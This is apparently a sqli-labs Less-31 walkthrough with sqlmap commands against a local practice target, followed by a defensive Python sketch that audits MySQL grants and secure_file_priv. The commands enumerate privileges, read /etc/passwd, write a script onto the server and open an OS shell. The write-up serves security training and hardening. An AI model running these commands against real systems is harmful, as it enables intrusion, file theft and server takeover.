sqlilabs WriteUp
Pub Date: 2023-10-17
Less-31
sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --risk 3 --level 5
Query the current user's privileges
sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --privileges
Check whether the current user is a DBA (database administrator)
sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --is-dba
Read the passwd file
sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --file-read "/etc/passwd"
Write a file
sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --file-write "/mnt/c/Users/andrew/bun.sh" --file-dest "/home/bun.sh"
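Conditions for running a shell
- Write permission is required
- PHP's automatic escaping feature (magic_quotes_gpc) is turned off
- Default options are offered for the website path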
sqlmap -u "http://127.0.0.1:8000/Less-31/?id=1" --os-shell
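Seen from the server side, the conditions above can be audited. The sketch below is an added example, not part of the original write-up: it takes SHOW GRANTS output and the MySQL secure_file_priv value and reports which of the file and shell options used on this page the database account would permit. The function names, the sample grants and the /var/www/html web root are constructed assumptions.

```python
import posixpath
import re

# Constructed sample SHOW GRANTS output (not taken from a real server).
WEAK_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` WITH GRANT OPTION"]
HARDENED_GRANTS = [
    "GRANT USAGE ON *.* TO `labs`@`localhost`",
    "GRANT SELECT ON `security`.* TO `labs`@`localhost`",
]

def global_privs(grant_lines):
    """Collect the privileges granted ON *.* (FILE is a global privilege)."""
    privs = set()
    for line in grant_lines:
        m = re.match(r"\s*GRANT\s+(.+?)\s+ON\s+\*\.\*\s+TO\s", line, re.I)
        if m:
            privs.update(p.strip().upper() for p in m.group(1).split(","))
    return privs

def path_allowed(path, secure_file_priv):
    """secure_file_priv: None (NULL) blocks file I/O, '' allows any path,
    a directory name limits file I/O to that directory."""
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    base = posixpath.normpath(secure_file_priv)
    target = posixpath.normpath(path)
    return target == base or target.startswith(base.rstrip("/") + "/")

def audit(grant_lines, secure_file_priv, web_root, web_root_writable,
          magic_quotes_gpc=False):
    """Return, per sqlmap option on this page, whether the MySQL layer allows it.
    web_root_writable: can the mysqld OS account write into web_root?
    OS permissions on the other paths are not modelled."""
    has_file = bool(global_privs(grant_lines) & {"FILE", "ALL PRIVILEGES", "ALL"})
    return {
        # LOAD_FILE() needs FILE and a path permitted by secure_file_priv
        "--file-read": has_file and path_allowed("/etc/passwd", secure_file_priv),
        # INTO OUTFILE / DUMPFILE to the destination used on this page
        "--file-write": has_file and path_allowed("/home/bun.sh", secure_file_priv),
        # the three conditions listed above, plus the FILE privilege
        "--os-shell": (has_file and path_allowed(web_root, secure_file_priv)
                       and web_root_writable and not magic_quotes_gpc),
    }

if __name__ == "__main__":
    print(audit(WEAK_GRANTS, "", "/var/www/html", True))
    print(audit(HARDENED_GRANTS, None, "/var/www/html", False))
```

An application account without the FILE privilege, together with secure_file_priv set to NULL or to a directory outside the web root, makes every entry False.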